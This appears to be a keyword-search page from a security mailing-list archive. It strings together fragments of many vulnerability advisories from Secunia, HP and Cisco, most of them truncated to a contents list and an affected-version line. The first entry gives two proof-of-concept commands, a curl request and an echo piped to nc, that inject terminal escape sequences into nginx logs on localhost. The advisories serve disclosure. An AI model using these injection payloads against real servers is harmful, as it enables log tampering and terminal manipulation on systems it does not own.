verify

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection

   (Affected versions: 0.94.14rc21 and probably earlier versions)

A) "nginx" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

Secunia Research: AproxEngine Multiple Vulnerabilities

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* AproxEngine 5.3.04

[security bulletin] HPSBMA02491 SSRT100060 rev.1 - HP Operations Manager for Windows, Remote Execution of Arbitrary Code

Note: The appropriate new version, either srcvw4.dll or srcvw32.dll, must be installed on the Operations Manager for Windows management server and on all remote console systems.

For Operations Manager for Windows v8.10 and v8.16

Verify the version of srcvw4.dll currently installed

Right-click on %OvInstallDir%\bin\srcvw4.dll
Select Properties
Switch to details tab
Check File version

Secunia Research: OpenX Multiple Vulnerabilities

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* OpenX 2.6.3

Secunia Research: Quicksilver Forums Cross-Site Request Forgery Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Quicksilver Forums 1.4.2

Secunia Research: Pulse CMS Cross-Site Request Forgery

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Pulse CMS basic version 1.2.2 and 1.2.3

Secunia Research: HP SiteScope SNMP Trap Script Insertion Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* HP SiteScope 9.0 build 911.

Secunia Research: Trend Micro OfficeScan "cgiRecvFile.exe" Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Trend Micro OfficeScan 7.3 patch 4 build 1362

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified IP Phones 7900 Series

These vulnerabilities are documented in Cisco bug IDs CSCtf07426 
and CSCtn65815 and have been assigned Common Vulnerabilities and 
Exposures (CVE) identifiers CVE-2011-1602 and CVE-2011-1603 
respectively.

Signature Verification Bypass Vulnerability
+------------------------------------------
Cisco Unified IP Phones 7900 Series devices are affected by a
signature verification bypass vulnerability that could allow an
authenticated attacker to load a software image without verification
of its signature.

[security bulletin] HPSBUX02335 SSRT071454 rev.1 - HP-UX Running useradd(1M), Local Unauthorized Access

 * The /etc/default/useradd template file is missing 
 * The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes 
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 


[security bulletin] HPSBUX02335 SSRT071454 rev.2 - HP-UX Running useradd(1M), Local Unauthorized Access

* The /etc/default/useradd template file is missing 
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes 
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 


[security bulletin] HPSBUX02366 SSRT080120 rev.2 - HPUX Running useradd(1M), Local Unauthorized Access

The corrupt /etc/default/useradd template file can cause accounts to be created with incorrect ownership and permissions. 
The patches ensure that useradd(1M) options are processed correctly in all cases.

MANUAL ACTIONS: Yes - NonUpdate 

Verify group id and home directory for all accounts 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 


[security bulletin] HPSBUX02366 SSRT080120 rev.1 - HPUX Running useradd(1M), Local Unauthorized Access

* The /etc/default/useradd template file is missing 
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes - NonUpdate 

Verify group id and home directory for all accounts 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 


Secunia Research: Orbit Downloader metalink "name" Directory Traversal

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Orbit Downloader 3.0.0.4 and 3.0.0.5

Secunia Research: Pulse CMS Arbitrary File Upload Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Pulse CMS basic version 1.2.2 and 1.2.3

Secunia Research: XnView DICOM Parsing Integer Overflow Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* XnView 1.97

Secunia Research: TaskFreak "tznMessage" Cross-Site Scripting Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* TaskFreak 0.6.3

Secunia Research: Quicksilver Forums "mysqldump" Password Disclosure

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Quicksilver Forums 1.4.2

Secunia Research: DevIL DICOM "GetUID()" Buffer Overflow Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* DevIL 1.7.8

Secunia Research: Sun Java JDK/JRE Soundbank Resource Parsing Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Sun Java JDK/JRE 1.6 Update 17

Secunia Research: aria2 metalink "name" Directory Traversal Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* aria2 1.9.1 build2

Secunia Research: Novell iPrint Client Date/Time Parsing Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Novell iPrint Client 4.38

Secunia Research: Winamp Impulse Tracker Sample Parsing Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Winamp 5.56 Media Player

Secunia Research: Winamp Impulse Tracker Instrument Parsing Buffer Overflows

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Winamp 5.56 Media Player

Secunia Research: Joomla BookLibrary From Same Author Module "id" SQL Injection

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* BookLibrary From Same Author 1.5

Secunia Research: Mozilla Firefox Memory Corruption Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Mozilla Firefox 3.0.15 and 3.5.4.

Secunia Research: e107 Avatar/Photograph Image File Upload Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* e107 version 0.7.19

Secunia Research: HP Power Manager "formExportDataLogs" Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* HP Power Manager version 4.2.9.

Secunia Research: TomatoCMS Script Insertion Vulnerabilities

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* TomatoCMS version 2.0.4.

Secunia Research: Adobe Shockwave Player 3D Model Two Integer Overflows

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Adobe Shockwave Player 11.5.2.602

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
